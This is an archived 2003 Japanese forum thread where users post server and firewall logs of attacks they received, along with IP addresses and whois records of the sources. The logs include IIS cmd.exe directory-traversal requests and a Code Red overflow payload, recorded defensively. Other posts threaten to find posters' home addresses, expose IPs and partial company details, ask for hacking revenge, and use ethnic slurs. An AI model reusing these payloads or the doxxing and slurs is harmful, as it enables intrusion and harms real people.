2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 403 275 "GET /_vti_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:37) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/07/08(22:27:37) W-SV 218.43.3.181 [80] 403 275 "GET /_mem_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:37) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/msadc/..\../..\../..\/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/07/08(22:27:37) W-SV 218.43.3.181 [80] 403 288 "GET /msadc/..\../..\../..\/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
512 :
名無しさん@お腹いっぱい。 :03/07/09 04:51
inetnum: 213.200.120.0 - 213.200.127.255
netname: NACNET-EU
descr: Tiscali International Network B.V.
descr: Robert-Bosch-Str. 32
descr: D-63303 Dreieich
country: DE
admin-c: SE33-RIPE
tech-c: TIS333-RIPE
status: ASSIGNED PA
notify:
[email protected] mnt-by: TISCALI-INT-NET
changed:
[email protected] 20020429
changed:
[email protected] 20020930
source: RIPE
513 :
名無しさん@お腹いっぱい。 :03/07/09 05:23
inetnum: 217.159.2.0 - 217.159.15.255
netname: Satlynx_Sat_Net_1
descr: Satlynx Satellite Link 1a
descr: Illerstr. 15
descr: D-71522 Backnang
descr: Germany
country: DE
admin-c: HB13461-RIPE
tech-c: RW552-RIPE
tech-c: HZI1-RIPE
status: ASSIGNED PA
mnt-by: GILAT-MNT
changed:
[email protected] 20030318
source: RIPE
514 :
名無しさん@お腹いっぱい。 :03/07/09 05:25
2003/07/09(05:22:46) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/09(05:22:47) W-SV 218.57.136.99 [80] 404 225 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/09(05:22:48) W-SV 218.57.136.99 [80] 404 225 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/09(05:22:56) W-SV 218.57.136.99 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.57.136.99 "/scripts/..\../winnt/system32/cmd.exe" ]" 2003/07/09(05:22:56) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/09(05:23:02) W-SV 218.57.136.99 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.57.136.99 "/scripts/../../winnt/system32/cmd.exe" ]" 2003/07/09(05:23:02) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
515 :
名無しさん@お腹いっぱい。 :03/07/09 06:03
inetnum: 213.200.120.0 - 213.200.127.255
netname: NACNET-EU
descr: Tiscali International Network B.V.
descr: Robert-Bosch-Str. 32
descr: D-63303 Dreieich
country: DE
admin-c: SE33-RIPE
tech-c: TIS333-RIPE
status: ASSIGNED PA
notify:
[email protected] mnt-by: TISCALI-INT-NET
changed:
[email protected] 20020429
changed:
[email protected] 20020930
source: RIPE
>>516 調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら
ぷゲラぷぷぷ
ペット〜キライ〜
↑糞アダルトリンク
>>520 調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら
523 :
名無しさん@お腹いっぱい。 :03/07/10 04:00
お前らそんなに知識あるならお願いがある。 北朝鮮の糞どもにギャフンと言わせたい!! どうしたらいい? ヒントでもいいから教えてください とりあえずはハードディスクをめちゃめちゃにしたいっす
525 :
名無しさん@お腹いっぱい。 :03/07/10 04:42
2003/07/10(04:02:18) W-SV 218.27.77.40 [80] 404 237 "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
526 :
名無しさん@お腹いっぱい。 :03/07/10 18:07
9 40 ms 40 ms 50 ms 62.216.128.245 10 40 ms 50 ms 50 ms 62.216.144.246 11 40 ms 50 ms 50 ms adsl029101.usr.hananet.net [210.94.29.101] 12 50 ms * * 218.39.19.34 13 51 ms 50 ms 50 ms 211.117.1.162 14 50 ms 60 ms 60 ms 218.236.67.46 15 50 ms 50 ms 50 ms 218.39.28.150 16 50 ms 50 ms 51 ms 219.250.35.211 この韓国人のバカは死ね
>526 師ね
529 :
名無しさん@お腹いっぱい。 :03/07/10 21:58
220.96.209.78=p8078-ipadfx01awa.osaka.ocn.ne.jp CSK-中部相互警備保障株式会社 [We are protect your wealth] 会社のPC(IIS)を使ってHP運営してるのはいいけど 自分の会社のHPも警備しろよ。 ワームに感染してるよ 2003/07/10(21:19:37) W-SV 220.96.209.78 [80] 404 237 "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
530 :
名無しさん@お腹いっぱい。 :03/07/11 12:11
2003/07/11(11:32:14) W-SV 61.195.3.44 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/11(11:32:14) W-SV 61.195.3.44 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 61.195.3.44 "/scripts/../../winnt/system32/cmd.exe" ]" 2003/07/11(11:32:14) W-SV 61.195.3.44 [80] 403 262 "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
>>552 そんなことくちだけじゃなくて実際にやって
みてくださいよ・・・・どうせむりなんでしょ?????
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
fltky2-p199.hi-ho.ne.jp(219.126.169.200)
IPアドレス 172.197.176.124 ホスト名 ACC5B07C.ipt.aol.com IPアドレス 割当国 アメリカ合衆国 (US)
Name: 218-228-205-242.eonet.ne.jp Address: 218.228.205.242 2003/07/12 15:04:09Treadrop attack
Name: o079126.ap.plala.or.jp Address: 219.167.79.126 2003/07/12 17:15:06Neastea attack
>>533 >IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台も悪.晒せ
IPアドレス 24.57.18.211 ホスト名 d57-18-211.home.cgocable.net IPアドレス 割当国 ※ カナダ (CA) IPアドレス所有者情報 Cogeco Cable Inc. CGOC-3BLK (NET-24-57-0-0-1) 24.57.0.0 - 24.57.255.255 Cogeco Cable Solutions CGOC-WIDO2-1 (NET-24-57-16-0-1) 24.57.16.0 - 24.57.31.255
218.13.37.133 220.4.96.91 202.98.123.49 63.57.19.42 202.19.129.136 211.83.248.26 61.217.124.221 202.130.83.98 211.5.36.132 67.202.109.204
66.199.149.229 202.97.143.205
217.59.156.35:3679
YahooBB220044017017.bbtec.net 211.99.96.200
202.109.129.136
拒否された電子メール アドレス : ************** 件名 '', アカウント : 'es-maili.esnet.ed.jp', サーバー : 'es-maili.esnet.ed.jp', プロトコル : SMTP, サーバーの応答 : '553 5.3.0 <*********>... This Server es-maili is not supported Internet Mail Service..', ポ ート : 25, セキュリティ (SSL) : なし IPアドレス 192.168.1.8 サブネットマスク 255.255.255.0 デフォルトゲートウェイ 192.168.1.100 DNSサーバー 10.20.33.18
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
というか踏み台を晒してくれているお陰でわざわざスキャンしなくて済みます。 ありがとう、初心者。
548 :
名無しさん@お腹いっぱい。 :03/07/14 18:07
このスレってやっぱ問題じゃね? 困る人とかいるんじゃねーの?
>>548 踏み台探す時間が省けて助かってるけど。
初めまして初心者だすよ 女にいじめを受けているので復讐として 奴らにハッキングする方法思いついた 誰か知っている人はみまそんか?????
>>552 この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
555 :
名無しさん@お腹いっぱい。 :03/07/15 01:08
265.289,.29.893
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
66.28.187.245
558 :
名無しさん@お腹いっぱい。 :03/07/16 05:47
218.70.245.64
560 :
◆E8yPg.mGTk :03/07/17 02:03
#218.70.245.64
561 :
名無しさん@お腹いっぱい。 :03/07/17 02:30
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス]
[email protected] [割当年月日] 2001/01/31
[返却年月日]
[最終更新] 2001/02/02 10:39:04 (JST)
[email protected]
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.43.128.0-218.43.191.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
y. [通知アドレス]
[email protected] [割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/12/25 19:39:40 (JST)
[email protected] ウザイぞ福岡人
200.80.33.36
ぞぬ入れてる香具師いる?
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.32.0-203.141.47.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [運用責任者] IT018JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] dnsn201.yahoo.co.jp
y. [通知アドレス]
[email protected] [割当年月日] 2003/02/07
[最終更新] 2003/03/06 17:17:41 (JST)
[email protected] もうね、2、3日で255回もしかけてくんなと。
総当りすンなと。
お腹いぱーいだYo!
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.116.0.0-219.116.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス]
[email protected] [割当年月日] 2002/10/16
[最終更新] 2003/04/16 14:08:58 (JST)
[email protected]
219.129.50.6sql 142.154.193.103sql 64.237.33.10sql 219.133.46.200sql 支那人ウザイ
219.111.85.231 231.85.111.219.dy.bbexcite.jp
65.35.169.116 6535169hfc116.tampabay.rr.com 61.40.220.235
>>579 はログのほとんどがゴミバケツであることを理解していない
そんなもんありません 200.102.24.152 - - [20/Jul/2003:10:18:03 +0000] "GET /phpwebsite/setup/ HTTP/1.0 " 302 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 200.102.24.152 - - [20/Jul/2003:10:18:05 +0000] "GET /setup/ HTTP/1.0" 302 278 " -" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
213.114.161.203 ←こいつしつこいseドメイン 66.143.58.33 220.210.235.138 210.63.140.123 65.169.6.4
584 :
名無しさん@お腹いっぱい。 :03/07/21 03:09
attaker -> attacker
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
587 :
名無しさん@お腹いっぱい。 :03/07/21 03:19
キターーーなんかいっぱいくましたぁ!!! news.redcentre.net news.redcentre.net saftdwin.demon.co.uk 200-207-88-30.dsl.telesp.net.br 221.red-80-33-36.pooles.rima-tde.net dragon.dmf.go.th
218.123.72.69:3042
590 :
”ヘ( ̄- ̄ ) :03/07/21 17:54
591 :
名無しさん@お腹いっぱい。 :03/07/21 18:08
広告よけアゲ
592 :
名無しさん@お腹いっぱい。 :03/07/21 18:11
age
>>1 よ、お前みたいな奴をみると、あの日のことを思い出すよ。
2001年11月28日。MXユーザーが逮捕された日だよ。
MXユーザーが逮捕されて、祭になってさ、
その日のうちに糞スレが乱立されてた日だよ。
あのときのダウソ板の住人、カッコよかったんだぜ。「総力を結集」ってのはまさにああいう状態だよ。
糞スレを3倍にしないと逮捕、ってもんだから、糞スレ立てまくってさ、
そしたらほんの何時間かで完成したんだよ。それが聞いてくれよ、目標は3倍だったのに
16倍まで乱立に成功しやがったんだよ。職人技なんてもんじゃねえよ、神技だよ。
でもよ、そうやって頑張る人がいた一方で、「もうだめぽ」とか駄レスしたバカも
いたわけだよ。ちょうど、今のお前みたいにな。
だからよ、俺たちは総力を結集して、お前のバカ度を16倍にしようと思うよ。
ま、倍増後でもお前のバカ度はこの世に生かしておくことのできないレベルだけどな。
要するに俺らの力を結集してもお前を助けることができないってことだ。
わかったら、まわりに迷惑をかけないようにひっそりと死んでくれよな
cr4-201-241.seaple.ne.jp
Domain Information: [ドメイン情報]
a. [ドメイン名] SEAPLE.NE.JP
b. [ねっとわーくさーびすめい] しーぷるねっとならしの
c. [ネットワークサービス名] しーぷるねっと習志野
d. [Network Service Name] seaplenet-narashino
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] MS6180JP
n. [技術連絡担当者] KH5470JP
p. [ネームサーバ] ns1.jcnet.ad.jp
p. [ネームサーバ]
p. [ネームサーバ] ns2.jcnet.ad.jp
y. [通知アドレス]
[email protected] [状態] Connected (2004/06/30)
[登録年月日] 2002/06/18
[接続年月日] 2002/07/12
[最終更新] 2003/07/01 02:18:07 (JST)
[email protected] 219.112.201.241
IPアドレス 218.123.72.69 ホスト名 YahooBB218123072069.bbtec.net あー、うぜー。 好きにしたって。
220.77.210.171
210.94.186.96 210.94.160.0 210.94.191.255 61.144.0.0 61.144.255.255 61.16.111.96 61.16.111.127 61.16.111.126 80.116.249.129 24.209.220.192 61.84.180.184 61.92.50.133 64.47.205.252 64.123.137.30 68.114.152.134
usen-219x120x221x79.ap-US.usen.ad.jp p2118-ip02souka.saitama.ocn.ne.jp
601 :
名無しさん@お腹いっぱい。 :03/07/24 19:02
ddb715a09.oct-net.ne.jp 94.27.244.43.ap.livedoor.jp こいつら、無差別攻撃してるらしいぞ。
605 :
名無しさん@お腹いっぱい。 :03/07/24 21:34
>>605 分かったから、ネットwatch板でやれよ
あそこならお前みたいなやつが一杯いるからよ
仲良くやって来い
IPアドレス 213.122.197.72 ホスト名 host213-122-197-72.in-addr.btopenworld.com
611 :
61-21-171-105.home.ne.jp :03/07/25 14:00
h
613 :
名無しさん@お腹いっぱい。 :03/07/25 16:52
広告よけage
614 :
名無しさん@お腹いっぱい。 :03/07/27 03:09
TearDrop攻撃された - Source:219.126.138.223
>>614 TeaDropの意味が分かってないに1000ペリカ
220.77.210.171←しつこすぎる 213.227.19.162
617 :
名無しさん@お腹いっぱい。 :03/07/27 19:21
192.168.0.1←こいつしつこい!氏ね!
ハア〜?
>>617 糞暑い夏にあなたのつまらない洒落で冷えました。
ありがとうございます。
192.168.0.1なら、ネットに繋がなくても存在しますね。
207.89.211.194
621 :
名無しさん@お腹いっぱい。 :03/07/27 23:18
620.617.614.607 <-死ね
あぼーん
81.213.0.73 212.235.117.229 133.205.228.244 66.117.30.76 172.172.76.187 64.236.237.57 209.86.207.181 195.146.99.180
172.145.221.66 172.157.234.118 209.187.115.88 218.176.200.33 172.137.219.7 24.81.13.115 218.176.201.10 218.176.200.92
>>615 TearDropってなに?
使ってみたけどよくわからん
61.74.31.127
218.230.246.158
>>627 韓国からだね。
ソウルの・・・っ怖!!
これ以上は止める。
>>628 会社みたいだね。
会社名:ア○イ○○株式会社
責任者:○田 ○一
住所 :東京都豊島区
631 :
名無しさん@お腹いっぱい。 :03/07/30 09:15
>>629 (((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
632 :
名無しさん@お腹いっぱい。 :03/07/30 17:52
633 :
名無しさん@お腹いっぱい。 :03/07/30 23:27
age
Yahooの所持IPからアタック来たぞゴルァ
211.14.15.96
[ JPNIC & JPRS database provides information on network administration. Its ]
[ use is restricted to network administration purposes. For further infor- ]
[ mation, use 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, ]
[ add'/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.12.0-211.14.15.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [運用責任者] IT018JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dnsg01.yahoo.co.jp/211.14.12.0-211.14.15.0
p. [ネームサーバ] dnsn201.yahoo.co.jp/211.14.12.0-211.14.15.0
y. [通知アドレス]
[email protected] [割当年月日] 2001/09/17
[返却年月日]
[最終更新] 2001/11/27 10:25:30 (JST)
[email protected]
635 :
名無しさん@お腹いっぱい。 :03/07/31 01:21
>>634 とっくに死滅したかと思っていたが、まだwhois得意になって貼る馬鹿が生き残ってるのか…
638 :
名無しさん@お腹いっぱい。 :03/07/31 01:28
あげ
スーマリの改造でもしてなさいってこった?
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
644 :
名無しさん@お腹いっぱい。 :03/08/06 20:11
あげ
645 :
名無しさん@お腹いっぱい。 :03/08/06 20:49
age
646 :
名無しさん@お腹いっぱい。 :03/08/06 21:03
IP: 202.133.227.202 Node: AD Group: WORKGROUP NetBIOS: <0102>__MSBROWSE__<02> MAC: 000255D6D473 DNS: 202.133.227.main1.above.net.tw
647 :
名無しさん@お腹いっぱい。 :03/08/06 21:04
IP: 219.162.47.100 Node: タイガーウッズ Group: WORKGROUP NetBIOS: ADMINISTRATOR MAC: 005345000000 DNS: p4100-ipbf29marunouchi.tokyo.ocn.ne.jp
648 :
名無しさん@お腹いっぱい。 :03/08/06 21:05
IP: 200.204.99.169 Node: ADMINISTRADOR Group: QUASARPROD NetBIOS: <0102>__MSBROWSE__<02> MAC: 00E04CDD38B7 DNS: 200-204-99-169.dsl.telesp.net.br
219.20.66.106
650 :
名無しさん@お腹いっぱい。 :03/08/07 22:22
inetnum: 202.123.128.0 - 202.123.159.255
netname: TALAYA2000
descr: IT&E OVERSEAS, INC.
descr: P.O. BOX 24881
descr: GMF
country: GU
admin-c: CT113-AP
tech-c: CT113-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-GU-TALAYA
changed:
[email protected] 20000802
status: ALLOCATED PORTABLE
source: APNIC
IPアドレス 218.123.72.195 ホスト名 YahooBB218123072195.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 xDSL
652 :
名無しさん@お腹いっぱい。 :03/08/09 12:24
24.157.141.78 からアクセスがきた。 こいつを不正アクセス禁止法で裁くには どういう手続きをとればいいの?
653 :
名無しさん@お腹いっぱい。 :03/08/09 12:37
IPアドレス 24.157.141.78 ホスト名 CPE0060b07cfdb1-CM014200015522.cpe.net.cable.rogers.com IPアドレス 割当国 ※ カナダ (CA) こいつをなんとか裁きたいのだが・・
654 :
名無しさん@お腹いっぱい。 :03/08/09 12:39
はかーのバカ共は原則処刑だな・・
DNS鯖をアタックだと勘違いしてるおばかさん達。
656 :
名無しさん@お腹いっぱい。 :03/08/09 12:50
657 :
名無しさん@お腹いっぱい。 :03/08/09 12:55
昨日はポート1177に来るんだけど俺だけか???
ああ、俺だ
1223.344.4944033.3234484.
662 :
名無しさん@お腹いっぱい。 :03/08/12 03:37
今、30秒おきくらいの頻度でport135をつつかれまくってるんだけど、何か始まってんの? IPは、多すぎて書ききれまへん。(踏み台かも知れんけど)
663 :
名無しさん@お腹いっぱい。 :03/08/12 04:01
664 :
名無しさん@お腹いっぱい。 :03/08/12 04:34
上のお陰で もう4回ほど再起動した また例のカウントダウンが始まるのだろうか…
666 :
名無しさん@お腹いっぱい。 :03/08/12 04:45
無
>>663 やっぱり他でも起こってるんですね…
ってか、これ↓みたいですね。
http://www.symantec.com/region/jp/sarcj/data/w/w32.blaster.worm.html ついにトロイじゃなくてワームが出たんだ…
ちなみに、ルータにしてるマシンのiplogはこんな感じです。
まだまだ続きそう。
Aug 12 06:50:25 TCP: port 135 connection attempt from 218.226.225.164:1676
Aug 12 06:58:22 TCP: port 135 connection attempt from 218.226.227.56:1696
Aug 12 06:58:40 TCP: port 135 connection attempt from 66.75.218.112:2511
Aug 12 06:58:40 TCP: port 135 connection attempt from 218.226.186.13:4529
Aug 12 07:03:41 TCP: port 135 connection attempt from 218.226.221.53:2470
Aug 12 07:03:46 TCP: port 135 connection attempt from 218.226.220.216:2968
Aug 12 07:12:24 TCP: port 135 connection attempt from 218.226.211.219:4433
Aug 12 07:12:29 TCP: port 135 connection attempt from 218.226.217.107:4281
Aug 12 07:13:16 TCP: port 135 connection attempt from 218.226.225.198:1420
Aug 12 07:14:43 TCP: port 135 connection attempt from 218.226.220.216:1934
669 :
GET! DVD :03/08/12 07:27
210.224.181.7様(さくらインターネット契約)、 あなたからは telnet,finger,pop2,printer,squdup,uupc,whois,login,8080,nntp,execなど、 ありとあらゆるポートに攻撃を仕掛けてきているか、踏み台にされている可能性があります。
と思ったら勘違いでした。 謹んでお詫び申し上げます。
672 :
名無しさん@お腹いっぱい。 :03/08/12 11:51
Name: c113110.tctv.ne.jp Address: 219.122.113.110
死んで詫びろ。馬鹿。
674 :
名無しさん@お腹いっぱい。 :03/08/12 12:23
IP: 61.207.116.252 DNS: p3252-ip01kokuryo.gunma.ocn.ne.jp Node: 無邪気 NetBIOS: 一号機 Group: WORKGROUP MAC: 005345000000
うちは135だけじゃなく、137も頻繁につつかれてる・・・ 非常にうざい
Someone from www.hakusuisha.co.jp [219.109.220.132], port 3904 wants to connect to port 135 owned by 'Generic Host Process for Win32 Services' on your
677 :
名無しさん@お腹いっぱい。 :03/08/12 22:41
kitauze- 時間, イベント, 侵入者, カウント 03/08/12 23:20:50, MSRPC TCP port probe, kita145058.kitanet.ne.jp, 2 03/08/12 23:20:41, MSRPC TCP port probe, kita142252.kitanet.ne.jp, 3 03/08/12 23:19:36, MSRPC TCP port probe, kita137119.kitanet.ne.jp, 1 03/08/12 23:18:03, MSRPC TCP port probe, kita140054.kitanet.ne.jp, 2 03/08/12 23:17:49, MSRPC TCP port probe, kita141200.kitanet.ne.jp, 2 03/08/12 23:10:00, MSRPC TCP port probe, kita144117.kitanet.ne.jp, 2 03/08/12 23:08:46, MSRPC TCP port probe, kita142229.kitanet.ne.jp, 2 03/08/12 23:07:38, MSRPC TCP port probe, kita145001.kitanet.ne.jp, 1 03/08/12 23:06:57, MSRPC TCP port probe, kita144134.kitanet.ne.jp, 2 03/08/12 22:57:25, MSRPC TCP port probe, kita142172.kitanet.ne.jp, 1 03/08/12 16:42:07, MSRPC TCP port probe, kita144225.kitanet.ne.jp, 4 03/08/12 16:37:37, MSRPC TCP port probe, kita143022.kitanet.ne.jp, 2 03/08/12 16:31:34, MSRPC TCP port probe, kita145058.kitanet.ne.jp, 1 03/08/12 16:28:03, MSRPC TCP port probe, kita141151.kitanet.ne.jp, 1 03/08/12 16:26:55, MSRPC TCP port probe, kita143154.kitanet.ne.jp, 1 03/08/12 16:25:38, MSRPC TCP port probe, kita142031.kitanet.ne.jp, 1 03/08/12 16:25:25, MSRPC TCP port probe, kita141197.kitanet.ne.jp, 1 03/08/12 16:25:01, MSRPC TCP port probe, kita141109.kitanet.ne.jp, 3 03/08/12 16:22:42, MSRPC TCP port probe, kita143055.kitanet.ne.jp, 2 03/08/12 16:18:26, MSRPC TCP port probe, kita144208.kitanet.ne.jp, 1 03/08/12 16:17:21, MSRPC TCP port probe, kita141088.kitanet.ne.jp, 2 03/08/12 16:17:20, MSRPC TCP port probe, kita143076.kitanet.ne.jp, 1 03/08/12 16:11:13, MSRPC TCP port probe, kita143115.kitanet.ne.jp, 2 03/08/12 16:10:56, MSRPC TCP port probe, kita141201.kitanet.ne.jp, 2 03/08/12 15:53:20, MSRPC TCP port probe, kita143004.kitanet.ne.jp, 1
678 :
名無しさん@お腹いっぱい。 :03/08/12 22:47
135より137のほうが多くない? それとntoskrnl.exeって何?
てst
680 :
名無しさん@お腹いっぱい。 :03/08/12 23:43
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.111.128.0-219.111.191.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [運用責任者] MK2734JP
n. [技術連絡担当者] SW314JP
n. [技術連絡担当者] YY1426JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
y. [通知アドレス]
[email protected] y. [通知アドレス]
[email protected] [割当年月日] 2002/08/09
[返却年月日]
[最終更新] 2003/08/12 15:32:15 (JST)
[email protected]
>>678 WinNTを起動する際に必要なファイルの1つだよ
結構重要なファイルなんだけど・・・・もしかして、やられた?
682 :
名無しさん@お腹いっぱい。 :03/08/13 00:33
>>681 やられたのかは分からないけど、GUi%GUICONFIG#SRULE@ADVRULECONFIG#NORMAL_105
とかって、送信しようとしてるけど何で?
本日2度目 こっちにも晒し IP Address:211.120.164.129 Network:Ikeda Multi Media Co.Ltd Location:Ikeda. Japan Node Name:zapd378a481.zaq.ne.jp
>>682 あまり詳しくないのでチカラになれません、ごめんね
でも、普通送信したりする必要のないファイルだから
ちょっとアヤシイんじゃないかなぁ
詳しい人、Help求む
2003/08/13 4:33:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:31:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:29:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:27:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:25:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:23:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:21:11通信の要求64.71.177.66TCP(1199) 2003/08/13 4:19:11通信の要求64.71.177.66TCP(1199) 誰か殺して
name: www.hakusuisha.co.jp Address: 219.109.220.132 tcp135番への攻撃。
687 :
名無しさん@お腹いっぱい。 :03/08/13 22:52
キバseven アタックがうざい。氏ね。ったく。プロクシ変えてもかわんねえ。 なんでだ?
>686 それwin2000だね
690 :
@@@@@ :03/08/14 03:43
691 :
名無しさん@お腹いっぱい。 :03/08/14 05:26
210.138.60.216
>>394 でもガイシュツの様だがUZEEEEEEEEEEEEEEEEEEEEEEEEEE
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.138.60.0
b. [ネットワーク名] IIJNET
f. [組織名] IIJ インターネット
g. [Organization] IIJ Internet
m. [運用責任者] TM003JP
n. [技術連絡担当者] JY018JP
p. [ネームサーバ] dns-b.iij.ad.jp
p. [ネームサーバ] dns-c.iij.ad.jp
y. [通知アドレス]
[email protected]
プロバのwhoisを晒すヤシが理解できない 何か意味があるのだろうか
693 :
名無しさん@お腹いっぱい。 :03/08/14 08:14
>>692 同意。
次は、スレタイ変えたほうがいいね。
694 :
名無しさん@お腹いっぱい。 :03/08/14 09:49
はっきりいっとくが ここにIPさらしてるやつほうが馬鹿だからな だいち個人を狙うハカーなぞそうそういない このスレで警察のIPとか軍のIP晒してる馬鹿がいるかもしれない そしてこのスレを見たハカー気取りがそのIPに攻撃始めるかもしれない 迷惑極まりない
695 :
